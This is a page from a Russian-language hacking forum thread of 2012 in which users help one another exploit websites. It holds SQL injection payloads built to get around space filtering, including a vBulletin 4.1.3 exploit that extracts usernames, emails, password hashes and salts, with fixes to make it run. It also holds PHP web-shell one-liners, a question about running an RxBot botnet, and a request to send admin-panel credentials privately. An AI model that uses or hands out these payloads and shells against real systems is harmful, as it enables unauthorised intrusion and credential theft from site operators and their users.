Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 987 of 1207
  1. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    Подскажите как юзать данную скулю. Там blind?
     
    #19721 kise, 12 Mar 2012
  2. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    Никак, то что Ereee привел вообще не inj, там же написано в заголовке. Зато ниже постом ниже уже описание sql inj через User Agent.
     
    #19722 trololoman96, 12 Mar 2012
  3. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    А как тогда использовать ту скулю с user agent?
    ----------
    Есть ли какой-нибудь инструмент для удобства использования такой скули?
     
    #19723 kise, 12 Mar 2012
  4. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Что дальше будет?
     
    #19724 Ereee, 12 Mar 2012
    Last edited: 12 Mar 2012
  5. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    Спасибо.
    Ereee я ни разу не работал с подменой кук, хедеров и т.п.
     
    #19725 kise, 12 Mar 2012
  6. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    блин я чувствую что уже рядом моя цель.
    в моем phpmyadmine версии 2.9.1.1 таких "команд" типа options, view text, full не существует как бы. Есть ключ или как говорит phpmyadmin индекс с названием full text.
    Сам в ключах не разбираюсь, и как это использовать так же не знаю. Мне нужен такой человек, который прошел через такую админку. Чтобы опыт был, если по другому.
     
    #19726 stan0009, 12 Mar 2012
  7. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    скинь в ПМ адрес этой админки пароль логин и если есть асю тоже напиши
     
    _________________________
    #19727 HAXTA4OK, 12 Mar 2012
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    там где [ ], что должно быть, чтобы выполнилось верно?
    фильтрация на + /**/ %0a и остальное
     
    _________________________
    #19728 yarbabin, 12 Mar 2012
  9. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Попробуй:
    Code:
    index.php?id=(1)union(select(1),2,3,4,5,6)
     
    #19729 Ereee, 12 Mar 2012
    1 person likes this.
  10. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Либо
    (1)and(1)=(1)union(select(1),2,3,4,5,6)+--+
     
    #19730 Pirotexnik, 12 Mar 2012
  11. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Я вас наверно уже задолбал)
    ну ладно)
    при открытии мини-шелла с кодом:
    Code:
    <?php eval($_GET[cmd]); ?>
    получается вот такая петрушка при ?cmd=phpinfo() и так далее:
    либо unexpected $end
    либо T_STRING
    system не катит, так как disallow.
    в чем подвох?
     
    #19731 stan0009, 12 Mar 2012
  12. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76

    ?cmd=phpinfo();
     
    #19732 Га-Ноцри, 12 Mar 2012
  13. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    если бы. так при любых командах
    я догадываюсь что дело в сервере
     
    #19733 stan0009, 12 Mar 2012
  14. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Вот такое нагуглил, может, что-нибудь подойдет в твоем случае :)

    PHP:
    QНашел sql-инъекциюно злые админы поставили на фильтрацию на пробелСуществуют ли аналоги пробела в sql-запросах?

    AЕще как существуютВот наиболее часто применяемые способы для замены пробела:

        +     или %2B;
            табуляция " " или %09;
            возврат каретки " " или %0D;
            перевод строки %0A;
            коментарий /**/
            скобкиselect(1)from(users)where(id=1)


    PHP:
    <? passthru($_GET[cmd]); ?>
    <?assert($_GET[cmd]); ?>
    Поэкспериментируй с этими.
     
    #19734 Га-Ноцри, 12 Mar 2012
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    как тут в конце заменить на скобки?
     
    _________________________
    #19735 yarbabin, 13 Mar 2012
  16. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    183
    Likes Received:
    22
    Reputations:
    2
    Ребята!!) Подскажите как управлять RxBot в мирке (Botnet)
     
    #19736 Groove, 13 Mar 2012
  17. DronS

    DronS New Member

    Joined:
    14 Jul 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Нашел эксплоит на exploit-db.com для Vbulletin 4.1.3
    Code:
    &messagegroupid[0]=3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1
    а DB мне в ответ вот так:
    Code:
    Invalid SQL:

					SELECT socialgroup.name
					FROM socialgroup AS socialgroup
					WHERE socialgroup.groupid IN (3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1);

MySQL Error   : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3
    Вопрос: как победить эту долбаную скобку в конце?
     
    #19737 DronS, 13 Mar 2012
  18. gl0w

    gl0w Member

    Joined:
    31 Dec 2011
    Messages:
    59
    Likes Received:
    21
    Reputations:
    5
    Добавить вот здесь:

    &messagegroupid[0]=3) UNION (SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1
     
    #19738 gl0w, 13 Mar 2012
    Last edited: 13 Mar 2012
  19. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    тогда нужно сделать так
    &messagegroupid[0]=3) UNION (SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt)) FROM user WHERE userid=1
     
    #19739 Faaax, 13 Mar 2012
  20. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    подкорректируй свой вопрос,а то не понятно и всмысле в конце скобки,поставь правильно вопрос
     
    #19740 Faaax, 13 Mar 2012
(You must log in or sign up to post here.)
Page 987 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.